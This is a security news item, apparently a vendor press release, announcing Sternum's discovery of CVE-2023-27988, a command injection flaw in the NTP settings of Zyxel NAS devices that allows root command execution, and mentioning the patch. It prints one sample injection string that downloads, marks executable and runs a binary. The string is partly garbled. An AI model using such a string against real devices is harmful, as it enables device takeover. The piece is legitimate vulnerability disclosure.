Contactez-nous Suivez-nous sur Twitter En francais English Language

Freely subscribe to our NEWSLETTER

Newsletter FR

Newsletter EN



Sternum Uncovers Security Vulnerability in Zyxel Networks’ NAS Appliances

May 2023 by Sternum

IoT security provider Sternum (, has identified a security vulnerability that affects owners of Zyxel Networks’ Linux-operated NAS326, NAS540, and NAS542 storage devices running the latest firmware (Version 5.21). The device vulnerability has been acknowledged by Zyxel who issued a patch and a Common Vulnerabilities and Exposures (CVE) notice, with CVE-2023-27988 being published on May, 30th, 2023.

The identified Zyxel NAS appliances allow for the storage of user data in a single location, including cloud data, photos, videos, or USB data. Sternum security researchers were in the process of scanning one of the Zyxel NAS units as part of the company’s standard lab deployment process when a “Dangerous String Format” alert was triggered by one of the security logics in the Sternum security platform. When such a pattern is confirmed, Sternum’s software issues an alert with the details of the string format and the executing process name — which identifies the root cause of the issue.

In this situation, there was a problem with a ntpdate_date process, which, as the name suggests, is responsible for periodically synchronizing the device’s internal clock via NTP pings. Knowing that it was passed as a string to ntpdate_date, Sternum researchers investigated further to see if it could be used to manipulate the device. These tests confirmed a vulnerability that could be used by an authenticated user to execute an arbitrary system command with root privileges on the system. This could be used for a more malicious purpose - for example, a remote malware injection could be performed with a string similar to: ;wget$;chmod$IFS+x$IFSbinary;./binary.

Applying the patch will fix the issue for Zyxel users, but Sternum researchers believe there may be a more extensive pattern here that needs to be addressed. Researchers point to recent news of a similar vulnerability discovered in ADVANTECH EKI-15XX serial device servers. A different device from a different company could also be compromised by manipulating the NTP server details from the control panel. These instances would not be unique or a rare coincidence, but rather pervasive in devices deployed globally.

See previous articles


See next articles

Your podcast Here

New, you can have your Podcast here. Contact us for more information ask:
Marc Brami
Phone: +33 1 40 92 05 55

All new podcasts